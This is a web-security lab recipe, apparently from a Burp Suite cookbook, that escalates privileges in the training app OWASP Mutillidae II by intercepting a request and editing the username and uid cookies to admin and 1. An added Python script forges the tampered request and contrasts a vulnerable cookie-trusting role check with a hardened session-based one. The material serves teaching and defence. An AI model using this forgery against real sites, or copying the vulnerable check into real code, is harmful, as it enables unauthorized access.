How to do it...

Ensure that Burp and the OWASP BWA VM are running, and that the Firefox browser used to view the OWASP BWA applications is configured to send its traffic through Burp's proxy listener.

  1. From the OWASP BWA landing page, click the link to the OWASP Mutillidae II application.
  2. In Firefox, open the login screen of OWASP Mutillidae II by clicking Login in the top menu.
  3. At the login screen, log in with the username john and the password monkey.
  4. Switch to Burp's Proxy | HTTP history tab. Find the POST request you just made by logging in as john and the GET request that followed it.
  5. Look at the GET request in the listing and note the cookie name/value pairs shown on the Cookie: line.

The name/value pairs of most interest are username=john and uid=3. Both are sent by the browser on every request, so the client controls them. What if we change these values to those of a different role?

  6. Let's attempt to manipulate the username and uid parameters stored in the cookie so that they match a different role. We will use Burp's Proxy | Intercept to perform this attack.
  7. Switch to the Proxy | Intercept tab and click the Intercept button so that it reads Intercept is on. Return to Firefox and reload the login page.
  8. The request is paused in the Proxy | Intercept tab. While it is paused, change the value of username in the Cookie: line from john to admin, and change the value of uid from 3 to 1.
  9. Click Forward, then click the Intercept button again to toggle it to Intercept is off.
  10. Return to Firefox and notice that we are now logged in as admin! We escalated our privileges from a regular user to an admin because the application trusts the username and uid values in the client-supplied cookie, and the developer performed no server-side authorization check on the assigned role.
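The following script is an added example, not code from the book or from Mutillidae. It reproduces the cookie edit from steps 7 to 9 in code, builds the raw GET request that Burp would forward, and then contrasts a vulnerable authorization check (identity taken from the client-controlled username/uid cookies) with a hardened one (identity resolved from a server-side session). The cookie contents, the PHPSESSID value, the uid-to-role table, the session store, the host and the request path are all constructed for illustration and are assumptions, not values taken from the application.

```python
"""Added example (not from the book or from Mutillidae): replays the cookie
tampering from the recipe in code and contrasts a vulnerable authorization
check with a hardened one.  The cookie contents, user table, session table,
host and path below are all constructed for illustration."""


# Constructed sample of the Cookie: line carried by the GET request after login.
# The username and uid names mirror the recipe; the PHPSESSID value is made up.
CAPTURED_COOKIE = "showhints=1; username=john; uid=3; PHPSESSID=9f3c1b2a7e5d"

# Constructed user table: uid -> (username, role).  uid 1 is admin, uid 3 is john.
USERS = {1: ("admin", "admin"), 3: ("john", "user")}

# Constructed server-side session store populated at login: PHPSESSID -> uid.
SESSIONS = {"9f3c1b2a7e5d": 3}


def parse_cookie(header):
    """Split a Cookie: header value into an ordered dict of name -> value."""
    pairs = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            pairs[name] = value
    return pairs


def tamper_cookie(header, **overrides):
    """Return the header with the given cookie values replaced, keeping the
    original order.  This is what step 8 does by hand in Proxy | Intercept."""
    pairs = parse_cookie(header)
    for name, value in overrides.items():
        pairs[name] = value
    return "; ".join(f"{name}={value}" for name, value in pairs.items())


def build_get(path, cookie_header, host="127.0.0.1"):
    """Raw HTTP/1.1 request as Burp would forward it after the edit
    (host and path are assumed values)."""
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header}\r\nConnection: close\r\n\r\n")


def role_vulnerable(cookie_header):
    """Vulnerable check: the role is looked up from the client-controlled
    uid cookie, so whoever edits the cookie picks the role."""
    cookie = parse_cookie(cookie_header)
    try:
        uid = int(cookie.get("uid", ""))
    except ValueError:
        return None  # malformed uid: treat as unauthenticated
    user = USERS.get(uid)
    return user[1] if user else None


def role_hardened(cookie_header):
    """Hardened check: only the opaque session id is read from the cookie;
    uid and role come from server-side state written at login, so the
    username and uid cookies are ignored even if present and tampered."""
    cookie = parse_cookie(cookie_header)
    uid = SESSIONS.get(cookie.get("PHPSESSID"))
    user = USERS.get(uid)
    return user[1] if user else None


if __name__ == "__main__":
    tampered = tamper_cookie(CAPTURED_COOKIE, username="admin", uid="1")
    print(build_get("/mutillidae/index.php", tampered))
    print("vulnerable app sees role:", role_vulnerable(tampered))
    print("hardened app sees role:  ", role_hardened(tampered))
```

The same edit can be repeated from Burp's Repeater instead of Intercept: paste the captured GET request, change the Cookie: line, and resend. The hardened function is the check to look for when reviewing a fix: the server must derive who the user is from state it controls (the session) and never from role or identity fields the browser sends back.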
